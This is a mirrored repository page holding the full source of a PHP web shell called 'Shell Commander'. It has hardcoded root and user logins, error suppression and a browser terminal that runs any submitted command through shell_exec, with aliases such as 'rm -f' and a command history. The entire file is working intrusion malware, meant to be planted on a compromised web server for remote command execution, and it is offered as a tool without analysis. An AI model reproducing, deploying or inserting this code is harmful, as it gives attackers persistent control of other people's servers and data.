mirror of
https://github.com/tennc/webshell
synced 2024-11-29 06:30:20 +00:00
322 lines
No EOL
9.3 KiB
Text
322 lines
No EOL
9.3 KiB
Text
<?php
|
|
|
|
|
|
error_reporting(0);
|
|
session_start();
|
|
|
|
unset($user); // Just in case ;-]
|
|
unset($pass);
|
|
|
|
if ($_POST['cmd']) $_POST['cmd'] = my_encode($_POST['cmd']);
|
|
|
|
$cache_lines = 1000;
|
|
$history_lines = 100;
|
|
$history_chars = 20;
|
|
|
|
$user[] = "root"; $pass[] = md5("fuckyou");
|
|
$user[] = "user"; $pass[] = md5("fuckhacker");
|
|
|
|
$alias = array(
|
|
"la" => "ls -la",
|
|
"rf" => "rm -f",
|
|
"unbz2" => "tar -xjpf",
|
|
"ungz" => "tar -xzpf"
|
|
);
|
|
|
|
|
|
|
|
if (!$_SESSION['user']) {
|
|
|
|
$pr_login = "Login:\n";
|
|
$pr_pass = "Password:\n";
|
|
$err = "Invalid login!\n\n";
|
|
$succ = "Warning!
|
|
Don`t be stupid .. this is a priv3 server, so take extra care!!!\n\n";
|
|
|
|
if ($_SESSION['login'] && $_POST['cmd']) { // WE HAVE USERNAME & PASSWORD
|
|
|
|
$_SESSION['output'] .= $pr_pass;
|
|
|
|
if (in_array($_SESSION['login'], $user)) { //........ USERNAME EXISTS
|
|
|
|
$key = array_search($_SESSION['login'], $user);
|
|
|
|
if ($pass[$key] != md5($_POST['cmd'])) { //....... WRONG PASSWORD
|
|
$_SESSION['output'] .= $err;
|
|
unset($_SESSION['login']);
|
|
$prompt = $pr_login;
|
|
|
|
} else { //..................................... SUCCESSFUL LOGIN
|
|
$_SESSION['user'] = $_SESSION['login'];
|
|
$_SESSION['whoami'] = substr(shell_exec("whoami"), 0, -1);
|
|
$_SESSION['host'] = substr(shell_exec("uname -n"), 0, -1);
|
|
$_SESSION['dir'] = substr(shell_exec("pwd"), 0, -1);
|
|
$_SESSION['output'] .= $succ;
|
|
$prompt = set_prompt();
|
|
unset($_SESSION['login']);
|
|
}
|
|
|
|
} else { //......................................... NO SUCH USERNAME
|
|
$_SESSION['output'] .= $err;
|
|
unset($_SESSION['login']);
|
|
$prompt = $pr_login;
|
|
}
|
|
|
|
} else { //................................................ LOGIN PROCESS
|
|
|
|
if (!$_SESSION['login'] && !$_POST['cmd']) $prompt = $pr_login;
|
|
|
|
if (!$_SESSION['login'] && $_POST['cmd']) {
|
|
$_SESSION['login'] = $_POST['cmd'];
|
|
$_SESSION['output'] .= substr($pr_login, 0, -1) . " $_POST[cmd]\n";
|
|
$prompt = $pr_pass;
|
|
}
|
|
}
|
|
|
|
} else { //........................................................ LOGGED IN
|
|
|
|
|
|
|
|
/*=-- MEMBERS AREA --=*\
|
|
\*=-- MEMBERS AREA --=*/
|
|
|
|
|
|
$prompt = set_prompt();
|
|
|
|
chdir($_SESSION['dir']);
|
|
|
|
if ($_REQUEST['clear_hist']) //............................ CLEAR HISTORY
|
|
$_SESSION['history'] = "";
|
|
|
|
if ($_SESSION['history']) $hist_arr = explode("\n", $_SESSION['history']);
|
|
|
|
if ($_POST['cmd']) {
|
|
|
|
if (!in_array($_POST['cmd'], $hist_arr)) { //......... ADD TO HISTORY
|
|
$hist_arr[] = $_POST['cmd'];
|
|
$_SESSION['history'] = implode("\n", $hist_arr);
|
|
}
|
|
|
|
if (count($hist_arr) > $history_lines) { //........... CUTOFF HISTORY
|
|
$start = count($hist_arr) - $history_lines;
|
|
$_SESSION['history'] = "";
|
|
|
|
for ($i = $start; $i < count($hist_arr); $i++)
|
|
$_SESSION['history'] .= $hist_arr[$i] . "\n";
|
|
|
|
$_SESSION['history'] = substr($_SESSION['history'], 0, -1);
|
|
$hist_arr = explode("\n", $_SESSION['history']);
|
|
}
|
|
|
|
$first_word = first_word($_POST['cmd']);
|
|
|
|
if (array_key_exists($first_word, $alias)) { //. CHECKING FOR ALIASES
|
|
$_POST['cmd'] = $alias[$first_word] . substr($_POST['cmd'], strlen($first_word));
|
|
$first_word = first_word($_POST['cmd']);
|
|
}
|
|
|
|
switch ($first_word) {
|
|
|
|
case "clear":
|
|
$_SESSION['output'] = "";
|
|
break;
|
|
|
|
case "exit":
|
|
session_destroy();
|
|
refresh();
|
|
break;
|
|
|
|
case "cd":
|
|
$_SESSION['output'] .= $prompt;
|
|
$result = shell_exec($_POST['cmd'] . " 2>&1 ; pwd");
|
|
$result = explode("\n", $result);
|
|
$_SESSION['dir'] = $result[count($result) - 2];
|
|
|
|
if (count($result) > 2) //.............. WE HAVE AN ERROR MESSAGE
|
|
$result[0] = "\n" . substr($result[0], strpos($result[0], "cd: ")) . "\n";
|
|
else $result[0] = "\n";
|
|
|
|
$prompt = set_prompt();
|
|
$_SESSION['output'] .= $_POST['cmd'] . $result[0];
|
|
break;
|
|
|
|
default:
|
|
$result = shell_exec($_POST['cmd'] . " 2>&1");
|
|
|
|
if (substr($result, -1) != "\n") $result .= "\n";
|
|
$_SESSION['output'] .= $prompt . $_POST['cmd'] . "\n" . $result;
|
|
|
|
$rows = preg_match_all('/\n/', $_SESSION['output'], $arr);
|
|
unset($arr);
|
|
|
|
if ($rows > $cache_lines) {
|
|
preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['output'], $out);
|
|
$_SESSION['output'] = $out[0] . "\n";
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
|
|
/*=-- FUNCTIONS --=*\
|
|
\*=-- FUNCTIONS --=*/
|
|
|
|
|
|
function my_encode($str) {
|
|
$str = str_replace("\\\\", "\\", $str);
|
|
$str = str_replace("\\\"", "\"", $str);
|
|
$str = str_replace("\\'", "'", $str);
|
|
|
|
while (strpos($str, " ") !== false) $str = str_replace(" ", " ", $str);
|
|
|
|
return rtrim(ltrim($str));
|
|
}
|
|
|
|
function set_prompt() {
|
|
global $_SESSION;
|
|
|
|
return $_SESSION['whoami'] . "@" . $_SESSION['host'] . " " . substr($_SESSION['dir'], strrpos($_SESSION['dir'], "/") + 1) . " $ ";
|
|
}
|
|
|
|
function first_word($str) {
|
|
list($str) = preg_split('/[ ;]/', $str);
|
|
return $str;
|
|
}
|
|
|
|
function refresh() {
|
|
global $_SERVER;
|
|
|
|
$self = substr($_SERVER['SCRIPT_NAME'], strrpos($_SERVER['SCRIPT_NAME'], "/") + 1);
|
|
header("Location: $self");
|
|
die;
|
|
}
|
|
|
|
|
|
|
|
/*=-- HTML PAGE --=*\
|
|
\*=-- HTML PAGE --=*/
|
|
|
|
|
|
$out = substr(preg_replace('/<\/(textarea)/i', '</\1', $_SESSION['output']), 0, -1);
|
|
|
|
?><HTML>
|
|
<HEAD>
|
|
|
|
<TITLE>Shell Commander</TITLE>
|
|
<STYLE TYPE="text/css"><!--
|
|
|
|
INPUT, TEXTAREA, SELECT, OPTION, TD {
|
|
color: #BBBBBB;
|
|
background-color: #000000;
|
|
font-family: Terminus, Fixedsys, Fixed, Terminal, Courier New, Courier;
|
|
}
|
|
|
|
TEXTAREA {
|
|
overflow-y: auto;
|
|
border-width: 0px;
|
|
height: 100%;
|
|
width: 100%;
|
|
padding: 0px;
|
|
}
|
|
|
|
INPUT {
|
|
border-width: 0px;
|
|
height: 26px;
|
|
width: 100%;
|
|
padding-top: 5px;
|
|
}
|
|
|
|
SELECT, OPTION {
|
|
color: #000000;
|
|
background-color: #BBBBBB;
|
|
}
|
|
|
|
BODY {
|
|
overflow-y: auto;
|
|
margin: 0;
|
|
}
|
|
|
|
--></STYLE>
|
|
<SCRIPT LANGUAGE="JavaScript"><!--
|
|
|
|
hist_arr = new Array();
|
|
|
|
<?php
|
|
|
|
foreach ($hist_arr as $key => $value) {
|
|
$value = str_replace("\\", "\\\\", $value);
|
|
$value = str_replace("\"", "\\\"", $value);
|
|
echo "hist_arr[$key] = \"$value\";\n";
|
|
}
|
|
|
|
?>
|
|
|
|
function parse_hist(key) {
|
|
if (key < hist_arr.length) {
|
|
if (key != "") {
|
|
document.getElementById('input').value = hist_arr[key];
|
|
document.getElementById('input').focus();
|
|
}
|
|
} else {
|
|
window.location.href = "?clear_hist=1";
|
|
}
|
|
}
|
|
|
|
function input_focus() {
|
|
document.getElementById('input').focus();
|
|
}
|
|
|
|
function selection_to_clipboard() { // IE only!
|
|
if (window.clipboardData && document.selection)
|
|
window.clipboardData.setData("Text", document.selection.createRange().text);
|
|
}
|
|
|
|
if (window.clipboardData)
|
|
document.oncontextmenu = new Function("document.getElementById('input').value = window.clipboardData.getData('Text'); input_focus(); return false");
|
|
|
|
--></SCRIPT>
|
|
</HEAD>
|
|
<BODY onLoad="document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight; input_focus()" TOPMARGIN="0" LEFTMARGIN="0">
|
|
<TABLE CELLPADDING="0" CELLSPACING="0" BORDER="0" HEIGHT="100%" WIDTH="100%">
|
|
<TR>
|
|
<TD HEIGHT="100%" BGCOLOR="#000000" STYLE="padding-top: 5px; padding-left: 5px; padding-right: 5px; padding-bottom: 0px"><TEXTAREA ID="output" onSelect="selection_to_clipboard()" onClick="input_focus()" READONLY><?= $out ?></TEXTAREA></TD>
|
|
</TR>
|
|
|
|
<TR>
|
|
<TD BGCOLOR="#000000"><TABLE CELLPADDING="0" CELLSPACING="5" BORDER="0" WIDTH="100%">
|
|
<TR>
|
|
<FORM METHOD="POST" ACTION="">
|
|
<TD NOWRAP onClick="input_focus()"><?= substr($prompt, 0, -1) ?></TD>
|
|
<TD WIDTH="100%"><INPUT ID="input" TYPE="<?= (!$_SESSION['user'] && $_SESSION['login']) ? 'PASSWORD' : 'TEXT' ?>" NAME="cmd"></TD>
|
|
</FORM><?php
|
|
|
|
if ($hist_arr) {
|
|
|
|
?><TD NOWRAP><SELECT onChange="parse_hist(this.options[this.selectedIndex].value)">
|
|
<OPTION VALUE="">--- HISTORY</OPTION><?php
|
|
|
|
for ($i = count($hist_arr) - 1; $i >= 0; $i--) {
|
|
|
|
if (strlen($hist_arr[$i]) > $history_chars) $option = substr($hist_arr[$i], 0, $history_chars - 3) . "...";
|
|
else $option = $hist_arr[$i];
|
|
|
|
echo "<OPTION VALUE=\"" . $i . "\">$option</OPTION>";
|
|
}
|
|
|
|
?><OPTION VALUE="<?= $history_lines + 1 ?>">--- CLEAR HISTORY</OPTION></SELECT></TD><?php
|
|
|
|
}
|
|
|
|
?></TR>
|
|
|
|
</TABLE></TD>
|
|
</TR>
|
|
</TABLE>
|
|
|
|
<SCRIPT LANGUAGE="JavaScript"><!--
|
|
document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight;
|
|
--></SCRIPT>
|
|
|
|
</BODY>
|
|
</HTML> |